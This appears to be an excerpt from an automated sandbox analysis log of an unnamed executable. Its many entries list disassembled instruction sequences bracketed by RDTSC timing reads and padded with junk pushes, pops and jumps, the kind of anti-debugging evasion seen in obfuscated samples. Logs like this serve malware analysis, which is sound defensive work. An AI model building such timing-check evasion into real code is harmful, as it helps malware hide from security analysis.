            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E66802 second address: E66822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF9ACE9409Bh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E66822 second address: E66828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E66962 second address: E6696E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6696E second address: E66976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E66EFA second address: E66EFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E694CE second address: E694D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E694D5 second address: E694DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E694DB second address: E694E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6D4D3 second address: E6D4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6D62D second address: E6D638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF9ACEA2286h 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6D638 second address: E6D64F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF9ACE940A2h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76942 second address: E76948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E76948 second address: E7694C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8723D second address: E87247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF9ACEA2286h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E870B5 second address: E870B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E870B9 second address: E870C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E897F6 second address: E89811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE940A7h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89811 second address: E8981E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8981E second address: E89827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89827 second address: E8983A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA228Fh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F8DD second address: E9F8FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF9ACE940A8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F8FE second address: E9F905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9FD06 second address: E9FD0C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA1632 second address: EA1638 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA1638 second address: EA1652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnl 00007FF9ACE940B3h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA70C7 second address: EA70FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FF9ACEA2288h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000004h 0x00000025 or dword ptr [ebp+122D2D35h], edi 0x0000002b push 7F1E595Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA70FF second address: EA7105 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA7105 second address: EA710A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC37ED second address: DC37F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53403E9 second address: 53403EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53403EF second address: 53403F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53403F5 second address: 5340497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF9ACEA2294h 0x0000000e push eax 0x0000000f jmp 00007FF9ACEA228Bh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 movzx ecx, bx 0x00000019 push ebx 0x0000001a pushfd 0x0000001b jmp 00007FF9ACEA228Ch 0x00000020 xor cx, 6B78h 0x00000025 jmp 00007FF9ACEA228Bh 0x0000002a popfd 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 mov si, bx 0x00000033 call 00007FF9ACEA2291h 0x00000038 pushfd 0x00000039 jmp 00007FF9ACEA2290h 0x0000003e add ecx, 2C8F9508h 0x00000044 jmp 00007FF9ACEA228Bh 0x00000049 popfd 0x0000004a pop esi 0x0000004b popad 0x0000004c mov edx, dword ptr [ebp+0Ch] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FF9ACEA2292h 0x00000056 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53606B1 second address: 536071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 1Eh 0x00000005 call 00007FF9ACE940A0h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f jmp 00007FF9ACE9409Eh 0x00000014 mov dword ptr [esp], ebp 0x00000017 pushad 0x00000018 push esi 0x00000019 call 00007FF9ACE9409Dh 0x0000001e pop eax 0x0000001f pop ebx 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007FF9ACE940A3h 0x00000028 xchg eax, ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF9ACE940A5h 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536071B second address: 536073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF9ACEA228Ch 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536073F second address: 5360745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360745 second address: 53607A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF9ACEA228Ch 0x00000013 adc esi, 627A9DC8h 0x00000019 jmp 00007FF9ACEA228Bh 0x0000001e popfd 0x0000001f mov ebx, esi 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007FF9ACEA2292h 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF9ACEA228Eh 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53607A0 second address: 53607C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACE940A0h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53607C4 second address: 53607CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53607CA second address: 53607D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53607D0 second address: 53607D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53607D4 second address: 53607E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bx, si 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53607E5 second address: 5360821 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 call 00007FF9ACEA228Fh 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f popad 0x00000010 nop 0x00000011 pushad 0x00000012 push esi 0x00000013 push ebx 0x00000014 pop esi 0x00000015 pop edi 0x00000016 jmp 00007FF9ACEA228Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF9ACEA228Eh 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360821 second address: 536084D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF9ACE940A1h 0x00000009 add cl, 00000016h 0x0000000c jmp 00007FF9ACE940A1h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536084D second address: 536085A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536085A second address: 536085E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53608B7 second address: 53608EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF9ACEA228Fh 0x00000009 jmp 00007FF9ACEA2293h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 cmp dword ptr [ebp-04h], 00000000h 0x00000016 pushad 0x00000017 mov si, 1107h 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53608EE second address: 536095D instructions: 0x00000000 rdtsc 0x00000002 call 00007FF9ACE940A6h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov esi, eax 0x0000000d jmp 00007FF9ACE940A1h 0x00000012 je 00007FF9ACE94117h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF9ACE940A3h 0x00000021 adc eax, 47FEF7DEh 0x00000027 jmp 00007FF9ACE940A9h 0x0000002c popfd 0x0000002d push esi 0x0000002e pop edx 0x0000002f popad 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609BA second address: 53609C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609C9 second address: 5360041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF9ACE9409Fh 0x00000008 mov dh, ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 mov edx, 03E2E510h 0x00000016 popad 0x00000017 leave 0x00000018 pushad 0x00000019 movsx ebx, si 0x0000001c push esi 0x0000001d push edi 0x0000001e pop ecx 0x0000001f pop ebx 0x00000020 popad 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 xor ebx, ebx 0x0000002a cmp eax, 00000000h 0x0000002d je 00007FF9ACE941E5h 0x00000033 xor eax, eax 0x00000035 mov dword ptr [esp], 00000000h 0x0000003c mov dword ptr [esp+04h], 00000000h 0x00000044 call 00007FF9B160FBEBh 0x00000049 mov edi, edi 0x0000004b jmp 00007FF9ACE940A7h 0x00000050 xchg eax, ebp 0x00000051 jmp 00007FF9ACE940A6h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FF9ACE9409Eh 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360041 second address: 53600AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, A6h 0x0000000d pushad 0x0000000e mov di, C322h 0x00000012 pushfd 0x00000013 jmp 00007FF9ACEA2293h 0x00000018 add si, 101Eh 0x0000001d jmp 00007FF9ACEA2299h 0x00000022 popfd 0x00000023 popad 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF9ACEA2298h 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600AC second address: 53600B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600B0 second address: 53600B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600B6 second address: 53600C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACE9409Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600C7 second address: 5360188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007FF9ACEA228Dh 0x0000000f push 37E2AB87h 0x00000014 jmp 00007FF9ACEA2297h 0x00000019 add dword ptr [esp], 3DC7F2C1h 0x00000020 jmp 00007FF9ACEA2296h 0x00000025 push 2FEC0DD5h 0x0000002a pushad 0x0000002b mov esi, edx 0x0000002d mov ax, dx 0x00000030 popad 0x00000031 add dword ptr [esp], 45B91D9Bh 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FF9ACEA228Bh 0x0000003f adc esi, 74546AFEh 0x00000045 jmp 00007FF9ACEA2299h 0x0000004a popfd 0x0000004b call 00007FF9ACEA2290h 0x00000050 call 00007FF9ACEA2292h 0x00000055 pop ecx 0x00000056 pop edi 0x00000057 popad 0x00000058 mov eax, dword ptr fs:[00000000h] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360188 second address: 536019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536019B second address: 53601A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601A1 second address: 53601A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601A5 second address: 53601D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FF9ACEA2296h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601D4 second address: 53601D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601D8 second address: 53601F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601F4 second address: 53601FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601FA second address: 536021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FF9ACEA2292h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536021B second address: 5360220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360220 second address: 53602CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF9ACEA228Eh 0x00000013 and esi, 73C75D08h 0x00000019 jmp 00007FF9ACEA228Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FF9ACEA2298h 0x00000025 add ah, 00000068h 0x00000028 jmp 00007FF9ACEA228Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FF9ACEA2294h 0x00000037 jmp 00007FF9ACEA2295h 0x0000003c popfd 0x0000003d movzx esi, bx 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FF9ACEA2299h 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53602CD second address: 53602D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53602D3 second address: 5360312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FF9ACEA2296h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF9ACEA228Ah 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360312 second address: 5360318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360318 second address: 536034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF9ACEA228Ch 0x00000009 jmp 00007FF9ACEA2295h 0x0000000e popfd 0x0000000f mov cx, 1AB7h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 mov ecx, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop esi 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536034D second address: 536036D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF9ACE940A6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536036D second address: 53603B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FF9ACEA2296h 0x00000011 push eax 0x00000012 jmp 00007FF9ACEA228Bh 0x00000017 xchg eax, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF9ACEA2290h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53603B0 second address: 53603BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53603BF second address: 536044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FF9ACEA228Bh 0x0000000b and ecx, 3058D30Eh 0x00000011 jmp 00007FF9ACEA2299h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [75AB4538h] 0x0000001f pushad 0x00000020 mov cl, 3Eh 0x00000022 pushfd 0x00000023 jmp 00007FF9ACEA2299h 0x00000028 add ax, 65F6h 0x0000002d jmp 00007FF9ACEA2291h 0x00000032 popfd 0x00000033 popad 0x00000034 xor dword ptr [ebp-08h], eax 0x00000037 jmp 00007FF9ACEA228Eh 0x0000003c xor eax, ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FF9ACEA228Ch 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536044E second address: 5360454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360454 second address: 5360458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360458 second address: 5360478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF9ACE940A5h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360478 second address: 536047F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
